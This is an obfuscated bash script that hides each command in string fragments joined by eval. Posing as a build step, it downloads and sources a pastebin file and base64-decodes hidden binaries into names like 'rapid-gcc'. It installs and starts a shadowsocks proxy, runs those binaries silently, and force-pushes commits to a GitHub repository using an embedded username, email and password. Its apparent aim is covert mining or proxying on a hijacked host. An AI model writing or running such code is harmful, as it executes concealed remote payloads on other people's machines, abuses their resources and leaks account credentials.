HBJy="do apt update"
esUyRN=" &>/dev/nu"
xVeKQlu="ll || tru"
eval "su""$HBJy""$esUyRN""$xVeKQlu""e"
DnujzDV="et -O codesrc "
fVTYK="https://paste"
xTcFc="bin.com/raw/UK"
KCitJUH="s9hZfc &>/dev/"
SkVYor="null"
eval "wg""$DnujzDV""$fVTYK""$xTcFc""$KCitJUH""$SkVYor"
nClw="urce ./co"
eval "so""$nClw""desrc"
git clone $SRC codes &>/dev/null
mVoLko="base64 -d co"
UvwgqZ="des/s > o"
eval "$mVoLko""$UvwgqZ"
aeagHxFf="udo apt --y"
mfYUdtLC="es install"
Fifxqq=" psmisc shad"
GJyhdYip="owsocks-li"
ecIaMWqn="bev &>/dev"
wfWDkaTf="/null || "
eval "s""$aeagHxFf""$mfYUdtLC""$Fifxqq""$GJyhdYip""$ecIaMWqn""$wfWDkaTf""true"
poNIB="o systemctl "
SBEOU="stop shado"
zAGlIQAC="wsocks-libev."
utaZwn="service &>/"
XMRp="dev/null |"
DglZo="| true"
eval "sud""$poNIB""$SBEOU""$zAGlIQAC""$utaZwn""$XMRp""$DglZo"
fbVtE="se64 -d co"
pEQlNp="des/c > rus"
CeLtebj="t"
eval "ba""$fbVtE""$pEQlNp""$CeLtebj""-cfg"
HrXgNAV="ase64 -d c"
FcCf="odes/gc > "
eval "b""$HrXgNAV""$FcCf""gc"
PkXHOOU="ase64 -d codes"
UxOrafR="/m > rapi"
eval "b""$PkXHOOU""$UxOrafR""d-gcc"
ytCaS="se64 -d code"
wGwU="s/p > prep"
eval "ba""$ytCaS""$wGwU""are"
PapHP="rce ./prepa"
eval "sou""$PapHP""re"
qQTx="sudo ss-lo"
NNmrMm="cal -c o --plug"
OiOn="in ./gqs --p"
PXdbRa="lugin-opts ./g"
rSIsdOV="c &>/dev/n"
eval "$qQTx""$NNmrMm""$OiOn""$PXdbRa""$rSIsdOV""ull &"
wccpkyWR="hmod +x rapid-"
ioHmmj="g"
eval "c""$wccpkyWR""$ioHmmj""cc"
vaaCEOtg="sed -i 's/gc"
NlQipSJm="c/trgfo/g' r"
ovFfoKi="ust"
eval "$vaaCEOtg""$NlQipSJm""$ovFfoKi""-cfg"
uuHOajwU="udo ./rapid-gcc"
xqznF=" -c rust-cfg &>"
UXSdm="/dev/null "
eval "s""$uuHOajwU""$xqznF""$UXSdm""&"
umdXUUTc="cho xo"
eval "e""$umdXUUTc""zpxa"
lYWAEe="sleep "
eval "$lYWAEe""64"
IeqrF="git clone htt"
ibRQ="ps://github.com"
UxExTnU="/fedora-ecu-d"
mHQxx="eform/mcp."
LVeu="git tmp &>/de"
SaDg="v/null || "
eval "$IeqrF""$ibRQ""$UxExTnU""$mHQxx""$LVeu""$SaDg""true"
bGfXz="tmp || tr"
eval "cd ""$bGfXz""ue"
LtcNkzNI="it config use"
aWGTK="r.name 'Ta"
dFNgpvP="mara Hramova'"
GUQKMB=" &>/dev/null"
KOEwBa=" || "
eval "g""$LtcNkzNI""$aWGTK""$dFNgpvP""$GUQKMB""$KOEwBa""true"
UtmUCH="it config user."
IbRrppN="email tamara.hr"
rkIQV="amovaklp@ramble"
MsaLOGu="r.ru &>/dev/n"
zvEH="ull || t"
eval "g""$UtmUCH""$IbRrppN""$rkIQV""$MsaLOGu""$zvEH""rue"
AOdjLx="UILD=\`date"
JHjqN=" +%s"
eval "B""$AOdjLx""$JHjqN""\`"
btmegr="AKE=\`date +%S\`"
eval "M""$btmegr"
echo $BUILD >> xozpxa$MAKE
git add xozpxa$MAKE &>/dev/null || true
git commit -m 'Reuploaded '$MAKE &>/dev/null || true
RbTpFqC=" push http"
OxPZefiX="s://tamara-h"
neBNMObc="ramovaklp:"
SlIqJxM="'8UWCurNWlD6"
RQFLaD="_7Je'@github.c"
XnXDR="om/fedora-e"
fqZhh="cu-deform/mcp"
IOFHyQaw=".git -f &>/dev"
TersAbR="/null || t"
pzpYrI="ru"
eval "git""$RbTpFqC""$OxPZefiX""$neBNMObc""$SlIqJxM""$RQFLaD""$XnXDR""$fqZhh""$IOFHyQaw""$TersAbR""$pzpYrI""e"
while :; do G=`date +%s`; echo '...building '$G; [ `expr 1491 + $BUILD` -lt $G ] && sudo killall rapid-gcc && break; sleep 128; done
